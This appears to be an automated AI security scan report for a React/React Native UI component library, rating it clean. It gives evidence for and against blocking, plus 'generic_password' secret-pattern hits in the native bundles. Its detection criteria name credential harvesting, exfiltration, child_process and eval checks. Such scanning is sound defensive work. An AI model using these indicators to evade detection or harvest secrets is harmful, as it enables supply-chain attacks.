AI Security Review
scanned 3d ago · by lpm-firewall-aiNo confirmed malicious attack surface was established. The package is a React/React Native UI component library with user-invoked networking and local persistence aligned to its documented components.
Static reason
One or more suspicious static signals were detected.
Trigger
Importing exported UI modules or rendering specific components/hooks.
Impact
No evidence of unconsented execution, credential harvesting, persistence, destructive behavior, or exfiltration.
Mechanism
UI rendering, optional feedback POST, public config detection, and local UI cache/theme storage.
Rationale
Static inspection found suspicious primitives only in package-aligned UI features and no install-time/import-time malware behavior. The source facts support a clean verdict despite scanner hits for network, env vars, and secret-like demo/public auth strings.
Evidence
package.jsondist/web/index.jsdist/native/index.jsdist/index.jsdist/motion-presets/motion-presets.jsREADME.md
Decision evidence
public snapshotAI called this Clean at 93.0% confidence as Benign with low false-positive risk.
Evidence for block
- dist/web/index.js has a user-invoked feedback form that POSTs to a caller-supplied endpoint.
- dist/web/index.js and dist/native/index.js read NEXT_PUBLIC_* env values for auth configuration.
- dist/web/index.js and dist/native/index.js use localStorage for theme/offline cache persistence.
Evidence against
- package.json defines no install/preinstall/postinstall lifecycle scripts or bin entrypoints.
- Exports point to React UI bundles: dist/web/index.js, dist/native/index.js, and motion presets.
- No child_process, fs/os/path imports, eval/new Function, native binaries, shell scripts, or dropped files found.
- Network code is component/hook driven: feedback endpoint is passed by the consumer; NetInfo checks connectivity only.
- Env reads are public client auth config detection, with demo fallback, not credential harvesting or exfiltration.
- External URLs are UI/documentation/assets such as GitHub metadata, social share links, Google Fonts, Unsplash avatars, and demo Supabase.
Behavioral surface
EnvironmentVarsNetwork
HighEntropyStringsUrlStrings
Source & flagged code
10 flagged · loading sourcedist/native/index.jsView file
8613patternName = generic_password
severity = medium
line = 8613
matchedText = newError...ed";
Medium
8615patternName = generic_password
severity = medium
line = 8615
matchedText = newError...rs";
Medium
8822patternName = generic_password
severity = medium
line = 8822
matchedText = newError...ed";
Medium
8824patternName = generic_password
severity = medium
line = 8824
matchedText = newError...rs";
Medium
8826patternName = generic_password
severity = medium
line = 8826
matchedText = newError...er";
Medium
dist/native/index.mjsView file
8636patternName = generic_password
severity = medium
line = 8636
matchedText = newError...ed";
Medium
8638patternName = generic_password
severity = medium
line = 8638
matchedText = newError...rs";
Medium
8853patternName = generic_password
severity = medium
line = 8853
matchedText = newError...ed";
Medium
8855patternName = generic_password
severity = medium
line = 8855
matchedText = newError...rs";
Medium
8857patternName = generic_password
severity = medium
line = 8857
matchedText = newError...er";
Medium
Findings
12 Medium3 Low
MediumSecret Patterndist/native/index.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndist/native/index.js
MediumSecret Patterndist/native/index.js
MediumSecret Patterndist/native/index.js
MediumSecret Patterndist/native/index.js
MediumSecret Patterndist/native/index.mjs
MediumSecret Patterndist/native/index.mjs
MediumSecret Patterndist/native/index.mjs
MediumSecret Patterndist/native/index.mjs
MediumSecret Patterndist/native/index.mjs
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings